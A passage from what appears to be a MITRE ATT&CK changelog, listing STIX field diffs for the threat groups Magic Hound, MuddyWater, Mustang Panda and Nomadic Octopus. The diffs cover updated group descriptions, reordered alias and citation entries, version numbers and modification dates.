COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-04 13:12:54.646000+00:00 | 2022-06-03 13:20:02.945000+00:00 |
| description | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) |
| external_references[1]['source_name'] | Magic Hound | Charming Kitten |
| external_references[1]['description'] | (Citation: Unit 42 Magic Hound Feb 2017) | (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[2]['source_name'] | TA453 | APT35 |
| external_references[2]['description'] | (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021) | (Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[3]['source_name'] | COBALT ILLUSION | ITG18 |
| external_references[3]['description'] | (Citation: Secureworks COBALT ILLUSION Threat Profile) | (Citation: IBM ITG18 2020) |
| external_references[4]['source_name'] | Charming Kitten | Phosphorus |
| external_references[4]['description'] | (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021) | (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[5]['source_name'] | ITG18 | TA453 |
| external_references[5]['description'] | (Citation: IBM ITG18 2020) | (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[6]['source_name'] | Phosphorus | COBALT ILLUSION |
| external_references[6]['description'] | (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021) | (Citation: Secureworks COBALT ILLUSION Threat Profile) |
| external_references[7]['source_name'] | Newscaster | Magic Hound |
| external_references[7]['description'] | Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018) | (Citation: Unit 42 Magic Hound Feb 2017) |
| external_references[8]['source_name'] | APT35 | Microsoft Phosphorus Mar 2019 |
| external_references[8]['description'] | (Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021) | Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020. |
| external_references[9]['source_name'] | FireEye APT35 2018 | Microsoft Phosphorus Oct 2020 |
| external_references[9]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021. |
| external_references[9]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ |
| external_references[10]['source_name'] | ClearSky Kittens Back 3 August 2020 | Certfa Charming Kitten January 2021 |
| external_references[10]['description'] | ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021. | Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021. |
| external_references[10]['url'] | https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf | https://blog.certfa.com/posts/charming-kitten-christmas-gift/ |
| external_references[11]['source_name'] | Certfa Charming Kitten January 2021 | Check Point APT35 CharmPower January 2022 |
| external_references[11]['description'] | Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021. | Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. |
| external_references[11]['url'] | https://blog.certfa.com/posts/charming-kitten-christmas-gift/ | https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/ |
| external_references[12]['source_name'] | Secureworks COBALT ILLUSION Threat Profile | ClearSky Charming Kitten Dec 2017 |
| external_references[12]['description'] | Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021. | ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/cobalt-illusion | http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf |
| external_references[13]['source_name'] | Proofpoint TA453 July2021 | ClearSky Kittens Back 2 Oct 2019 |
| external_references[13]['description'] | Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021. | ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021. |
| external_references[13]['url'] | https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453 | https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf |
| external_references[14]['source_name'] | Unit 42 Magic Hound Feb 2017 | ClearSky Kittens Back 3 August 2020 |
| external_references[14]['description'] | Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. | ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021. |
| external_references[14]['url'] | https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ | https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf |
| external_references[15]['source_name'] | Proofpoint TA453 March 2021 | Eweek Newscaster and Charming Kitten May 2014 |
| external_references[15]['description'] | Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021. | Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021. |
| external_references[15]['url'] | https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential | https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering |
| external_references[16]['source_name'] | ClearSky Charming Kitten Dec 2017 | Unit 42 Magic Hound Feb 2017 |
| external_references[16]['description'] | ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. | Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. |
| external_references[16]['url'] | http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf | https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ |
| external_references[17]['source_name'] | Eweek Newscaster and Charming Kitten May 2014 | Newscaster |
| external_references[17]['description'] | Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021. | Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018) |
| external_references[18]['source_name'] | ClearSky Kittens Back 2 Oct 2019 | FireEye APT35 2018 |
| external_references[18]['description'] | ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. |
| external_references[18]['url'] | https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf |
| external_references[19]['source_name'] | IBM ITG18 2020 | Proofpoint TA453 July2021 |
| external_references[19]['description'] | Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021. | Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021. |
| external_references[19]['url'] | https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/ | https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453 |
| external_references[20]['source_name'] | Microsoft Phosphorus Mar 2019 | Proofpoint TA453 March 2021 |
| external_references[20]['description'] | Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020. | Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021. |
| external_references[20]['url'] | https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ | https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential |
| external_references[21]['source_name'] | Microsoft Phosphorus Oct 2020 | Secureworks COBALT ILLUSION Threat Profile |
| external_references[21]['description'] | Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021. | Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021. |
| external_references[21]['url'] | https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ | https://www.secureworks.com/research/threat-profiles/cobalt-illusion |
| x_mitre_version | 4.0 | 5.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'IBM ITG18 2020', 'description': 'Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.', 'url': 'https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/'} | |
| x_mitre_contributors | Daniyal Naeem, BT Security |
| Old Description | New Description |
|---|---|
| [MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017) | [MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Ozer Sarilar, @ozersarilar, STM', 'Daniyal Naeem, BT Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 22:30:05.308000+00:00 | 2022-10-17 12:43:55.847000+00:00 |
| description | [MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017) | [MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022) |
| aliases[1] | Earth Vetala | Earth Vetala |
| external_references[1]['source_name'] | MuddyWater | MERCURY |
| external_references[1]['description'] | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018) | (Citation: Anomali Static Kitten February 2021) |
| external_references[2]['source_name'] | Earth Vetala | Static Kitten |
| external_references[2]['description'] | (Citation: Trend Micro Muddy Water March 2021) | (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[3]['source_name'] | MERCURY | TEMP.Zagros |
| external_references[3]['description'] | (Citation: Anomali Static Kitten February 2021) | (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[4]['source_name'] | Static Kitten | Seedworm |
| external_references[4]['description'] | (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[5]['source_name'] | Seedworm | Earth Vetala |
| external_references[5]['description'] | (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Trend Micro Muddy Water March 2021) |
| external_references[6]['source_name'] | TEMP.Zagros | MuddyWater |
| external_references[6]['description'] | (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018) |
| external_references[7]['source_name'] | Unit 42 MuddyWater Nov 2017 | ClearSky MuddyWater Nov 2018 |
| external_references[7]['description'] | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf |
| external_references[8]['source_name'] | Symantec MuddyWater Dec 2018 | ClearSky MuddyWater June 2019 |
| external_references[8]['description'] | Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018. | ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. |
| external_references[8]['url'] | https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group | https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf |
| external_references[9]['source_name'] | ClearSky MuddyWater Nov 2018 | CYBERCOM Iranian Intel Cyber January 2022 |
| external_references[9]['description'] | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. | Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022. |
| external_references[9]['url'] | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf | https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ |
| external_references[10]['source_name'] | ClearSky MuddyWater June 2019 | DHS CISA AA22-055A MuddyWater February 2022 |
| external_references[10]['description'] | ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. | FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. |
| external_references[10]['url'] | https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf | https://www.cisa.gov/uscert/ncas/alerts/aa22-055a |
| external_references[11]['source_name'] | Reaqta MuddyWater November 2017 | Unit 42 MuddyWater Nov 2017 |
| external_references[11]['description'] | Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020. | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. |
| external_references[11]['url'] | https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ |
| external_references[12]['source_name'] | Trend Micro Muddy Water March 2021 | Talos MuddyWater Jan 2022 |
| external_references[12]['description'] | Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. | Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022. |
| external_references[12]['url'] | https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html |
| external_references[14]['source_name'] | FireEye MuddyWater Mar 2018 | Trend Micro Muddy Water March 2021 |
| external_references[14]['description'] | Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018. | Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. |
| external_references[14]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html | https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html |
| x_mitre_version | 3.0 | 4.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Reaqta MuddyWater November 2017', 'description': 'Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.', 'url': 'https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/'} | |
| external_references | {'source_name': 'FireEye MuddyWater Mar 2018', 'description': 'Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html'} | |
| external_references | {'source_name': 'Symantec MuddyWater Dec 2018', 'description': 'Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.', 'url': 'https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group'} |
| Old Description | New Description |
|---|---|
| [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:11:44.216000+00:00 | 2022-04-11 16:43:52.231000+00:00 |
| description | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) |
| external_references[3]['description'] | (Citation: Recorded Future REDDELTA July 2020) | (Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022) |
| external_references[5]['source_name'] | Crowdstrike MUSTANG PANDA June 2018 | Anomali MUSTANG PANDA October 2019 |
| external_references[5]['description'] | Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. | Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ | https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations |
| external_references[6]['source_name'] | Anomali MUSTANG PANDA October 2019 | Secureworks BRONZE PRESIDENT December 2019 |
| external_references[6]['description'] | Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. | Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. |
| external_references[6]['url'] | https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations | https://www.secureworks.com/research/bronze-president-targets-ngos |
| external_references[7]['source_name'] | Secureworks BRONZE PRESIDENT December 2019 | Recorded Future REDDELTA July 2020 |
| external_references[7]['description'] | Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. | Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. |
| external_references[7]['url'] | https://www.secureworks.com/research/bronze-president-targets-ngos | https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf |
| external_references[8]['source_name'] | Proofpoint TA416 November 2020 | Crowdstrike MUSTANG PANDA June 2018 |
| external_references[8]['description'] | Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021. | Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. |
| external_references[8]['url'] | https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ |
| external_references[9]['source_name'] | Recorded Future REDDELTA July 2020 | Proofpoint TA416 November 2020 |
| external_references[9]['description'] | Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. | Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021. |
| external_references[9]['url'] | https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf | https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint TA416 Europe March 2022', 'description': 'Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european'} |
| Old Description | New Description |
|---|---|
| [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 15:22:52.708000+00:00 | 2022-09-02 18:03:55.294000+00:00 |
